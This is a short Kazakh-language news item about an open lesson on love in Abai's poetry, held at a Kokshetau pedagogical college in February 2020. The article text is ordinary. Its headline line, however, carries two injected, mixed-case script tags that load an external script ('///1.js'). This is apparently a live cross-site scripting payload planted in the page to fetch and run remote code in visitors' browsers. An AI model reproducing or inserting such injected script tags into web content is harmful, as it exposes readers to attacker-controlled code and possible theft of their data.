«Махаббат – өмір негізі»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.02.2020

Ақмола облысы білім басқармасының «Облыстық оқу-әдістемелік кабинеті» КММ-сі Қазақстан Республикасы Білім және ғылым министрлігінің 2020 жылғы 16 қаңтарындағы хатының негізінде 2020 жылдың 03-12 ақпан аралығында «Өзін-өзі тану: махаббат пен шығармашылық педагогикасы» атты дәстүрлі онкүндігі өтті.

Осы онкүндік аясында 12 ақпан күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің оқытушысы Азбергенова Баян Әубәкірқызының ұйымдастыруымен «Махаббат – өмір негізі» тақырыбында ашық сабақ өтті.

«Бастауыш мектеп» бөлімінің студенттерімен өткізілген сабақта махаббат пен сүйіспеншіліктің түрлері анықталып, Абай лирикасындағы махаббат тақырыбына талдау жасалды. Сабақ барысында «Оқы. Талда. Пікір алмас», «Елші», «Кластер», «Плюс, минус, қызықты» әдістері оқытушы тарапынан ұтымды қолданылды. Ашық сабаққа колледж әдіскері, оқытушылары қатысып, жоғары баға берді.

Просмотров: 633


Пікір қосу



Деректерді қолтаңбаға қосу